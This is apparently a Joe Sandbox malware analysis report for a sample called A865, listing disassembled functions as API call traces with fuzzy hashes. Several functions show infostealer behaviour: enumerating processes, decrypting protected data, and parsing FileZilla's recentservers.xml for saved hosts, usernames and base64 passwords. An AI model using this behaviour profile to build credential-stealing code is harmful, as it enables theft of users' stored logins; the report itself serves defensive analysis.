                                                            • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                            • Instruction Fuzzy Hash: FF010075A90208BBEB10DFD4DD45F9D77B9EB44704F108155FB05AA2C4D6B4AA00CB66
                                                            Function 00419600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                                            • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                                            • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                                            • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 420147892-0
                                                            • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                            • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                                            • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                            • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                                            Function 022E9867 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 022E9885
                                                            • Process32First.KERNEL32(00420ACA,00000128), ref: 022E9899
                                                            • Process32Next.KERNEL32(00420ACA,00000128), ref: 022E98AE
                                                            • StrCmpCA.SHLWAPI(?,00000000), ref: 022E98C3
                                                            • CloseHandle.KERNEL32(00420ACA), ref: 022E98E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 420147892-0
                                                            • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                            • Instruction ID: bed392d1c59406249c2bfdd7b74981ed85f29ea5f5ccd7a468ab886350c018da
                                                            • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                            • Instruction Fuzzy Hash: D201E979A60208FBDB20DFE4CD54BEDB7F9EF49700F404189A506A6254D7749A80DF51
                                                            Function 00418EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: BinaryCryptString
                                                            • String ID:
                                                            • API String ID: 80407269-0
                                                            • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                            • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                                            • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                            • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                                            Function 022E9107 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptBinaryToStringA.CRYPT32(00000000,022D53EB,40000001,00000000,00000000,?,022D53EB), ref: 022E9127
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: BinaryCryptString
                                                            • String ID:
                                                            • API String ID: 80407269-0
                                                            • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                            • Instruction ID: 622d2ef8113f0193da235df1660f906510042ef9c57664332be7fcb04a29c989
                                                            • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                            • Instruction Fuzzy Hash: DF11DD74214205BFDF00CF94DC89FAA33AAAF89754F409559FD0A8F264D775E881EB60
                                                            Function 022D9D27 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022D5155,00000000,00000000), ref: 022D9D56
                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,022D5155,00000000,?), ref: 022D9D68
                                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022D5155,00000000,00000000), ref: 022D9D91
                                                            • LocalFree.KERNEL32(?,?,?,?,022D5155,00000000,?), ref: 022D9DA6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: BinaryCryptLocalString$AllocFree
                                                            • String ID:
                                                            • API String ID: 4291131564-0
                                                            • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                            • Instruction ID: f1e0d2950fb66c37afa73a8a57ec2a713583f5a14ecf84620eb785c2c8bedc6a
                                                            • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                            • Instruction Fuzzy Hash: 8611A4B4240208BFEB10CFA4CC95FAA77B5EB89704F208058FD159B394C776A941CB90
                                                            Function 00409B60 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                            • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                            • LocalFree.KERNEL32(?), ref: 00409BD3
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                            • String ID:
                                                            • API String ID: 3243516280-0
                                                            • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                            • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                                            • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                            • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                                            Function 022D9DC7 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 022D9DEB
                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 022D9E0A
                                                            • memcpy.MSVCRT(?,?,?), ref: 022D9E2D
                                                            • LocalFree.KERNEL32(?), ref: 022D9E3A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                            • String ID:
                                                            • API String ID: 3243516280-0
                                                            • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                            • Instruction ID: d9f662d17a182aba864762757bef7205fdf38135c504fd4ba0f7128c44408f0a
                                                            • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                            • Instruction Fuzzy Hash: 7D1109B8A00209EFDB04CFA8D985AAEB7B9FF89304F104559F915A7350D730AE50CFA1
                                                            Function 00417A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,008797C8,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,008797C8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,008797C8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                                            • wsprintfA.USER32 ref: 00417AB7
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                            • String ID:
                                                            • API String ID: 362916592-0
                                                            • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                            • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                                            • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                            • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                                            Function 00413720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                            • String ID:
                                                            • API String ID: 123533781-0
                                                            • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                            • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                                            • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                            • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                                            Function 022ED1D3 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: free
                                                            • String ID:
                                                            • API String ID: 1294909896-0
                                                            • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                            • Instruction ID: 73b83034997c00ce190831bab7256bad9184d10151853065d219d92f9c26525e
                                                            • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                            • Instruction Fuzzy Hash: 5071C131471B80EBDF6B3BB1DD01F8E7AA3BF04702F904924B1DB295749E226865BE51
                                                            Function 00410250 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 363stringmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                            • strtok_s.MSVCRT ref: 0041031B
                                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                                            • lstrlenA.KERNEL32(00000000), ref: 00410393
                                                              • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                              • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                                            • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                                            • lstrlenA.KERNEL32(00000000), ref: 00410427
                                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                                            • lstrlenA.KERNEL32(00000000), ref: 00410475
                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                                            • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                                            • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                                            • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                                            • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                                            • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                                            • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                                            • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                                            • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                                            • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                                            • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                                            • strtok_s.MSVCRT ref: 00410679
                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                                            • memset.MSVCRT ref: 004106DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                            • API String ID: 337689325-514892060
                                                            • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                            • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                                            • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                            • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                                            Function 022D4827 Relevance: 51.1, APIs: 34, Instructions: 114stringmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00424DA0), ref: 022D4833
                                                            • lstrlen.KERNEL32(00424E50), ref: 022D483E
                                                            • lstrlen.KERNEL32(00424F18), ref: 022D4849
                                                            • lstrlen.KERNEL32(00424FD0), ref: 022D4854
                                                            • lstrlen.KERNEL32(00425078), ref: 022D485F
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 022D486E
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022D4875
                                                            • lstrlen.KERNEL32(00425120), ref: 022D4883
                                                            • lstrlen.KERNEL32(004251C8), ref: 022D488E
                                                            • lstrlen.KERNEL32(00425270), ref: 022D4899
                                                            • lstrlen.KERNEL32(00425318), ref: 022D48A4
                                                            • lstrlen.KERNEL32(004253C0), ref: 022D48AF
                                                            • lstrlen.KERNEL32(00425468), ref: 022D48C3
                                                            • lstrlen.KERNEL32(00425510), ref: 022D48CE
                                                            • lstrlen.KERNEL32(004255B8), ref: 022D48D9
                                                            • lstrlen.KERNEL32(00425660), ref: 022D48E4
                                                            • lstrlen.KERNEL32(00425708), ref: 022D48EF
                                                            • lstrlen.KERNEL32(004257B0), ref: 022D4918
                                                            • lstrlen.KERNEL32(00425858), ref: 022D4923
                                                            • lstrlen.KERNEL32(00425920), ref: 022D492E
                                                            • lstrlen.KERNEL32(004259C8), ref: 022D4939
                                                            • lstrlen.KERNEL32(00425A70), ref: 022D4944
                                                            • strlen.MSVCRT ref: 022D4957
                                                            • lstrlen.KERNEL32(00425B18), ref: 022D497F
                                                            • lstrlen.KERNEL32(00425BC0), ref: 022D498A
                                                            • lstrlen.KERNEL32(00425C68), ref: 022D4995
                                                            • lstrlen.KERNEL32(00425D10), ref: 022D49A0
                                                            • lstrlen.KERNEL32(00425DB8), ref: 022D49AB
                                                            • lstrlen.KERNEL32(00425E60), ref: 022D49BB
                                                            • lstrlen.KERNEL32(00425F08), ref: 022D49C6
                                                            • lstrlen.KERNEL32(00425FB0), ref: 022D49D1
                                                            • lstrlen.KERNEL32(00426058), ref: 022D49DC
                                                            • lstrlen.KERNEL32(00426100), ref: 022D49E7
                                                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 022D4A03
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                            • String ID:
                                                            • API String ID: 2127927946-0
                                                            • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                            • Instruction ID: c92d7508e6709aee49e0be563c1c34b0bfca0015370bb95c55c0003eaa20f757
                                                            • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                            • Instruction Fuzzy Hash: E241A879740624EBC718AFE5EC89B987F71AB4C712BA0C062F90299190CBF5D511DB3E
                                                            Function 022E9AC7 Relevance: 49.7, APIs: 33, Instructions: 212libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022E9B08
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022E9B21
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022E9B39
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022E9B51
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022E9B6A
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022E9B82
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 022E9B9A
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022E9BB3
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022E9BCB
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022E9BE3
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022E9BFC
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022E9C14
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 022E9C2C
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022E9C45
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 022E9C5D
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 022E9C75
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 022E9C8E
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 022E9CA6
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 022E9CBE
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 022E9CD7
                                                            • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 022E9CEF
                                                            • LoadLibraryA.KERNEL32(0064A550,?,022E6C67), ref: 022E9D01
                                                            • LoadLibraryA.KERNEL32(0064A17C,?,022E6C67), ref: 022E9D12
                                                            • LoadLibraryA.KERNEL32(0064A104,?,022E6C67), ref: 022E9D24
                                                            • LoadLibraryA.KERNEL32(0064A1DC,?,022E6C67), ref: 022E9D36
                                                            • LoadLibraryA.KERNEL32(0064A328,?,022E6C67), ref: 022E9D47
                                                            • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 022E9D69
                                                            • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 022E9D8A
                                                            • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 022E9DA2
                                                            • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 022E9DC4
                                                            • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 022E9DE5
                                                            • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 022E9E06
                                                            • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 022E9E1D
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID:
                                                            • API String ID: 2238633743-0
                                                            • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                            • Instruction ID: 53cb10b912881480f6cc348d60ee232ac40a3c26526d25caf30921e261c55479
                                                            • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                            • Instruction Fuzzy Hash: 9CA14CBD5D0240BFE364EFE8ED88A963BFBF74E201704661AE605C3264D7399441DB12
                                                            Function 022E04B7 Relevance: 48.4, APIs: 32, Instructions: 363stringmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
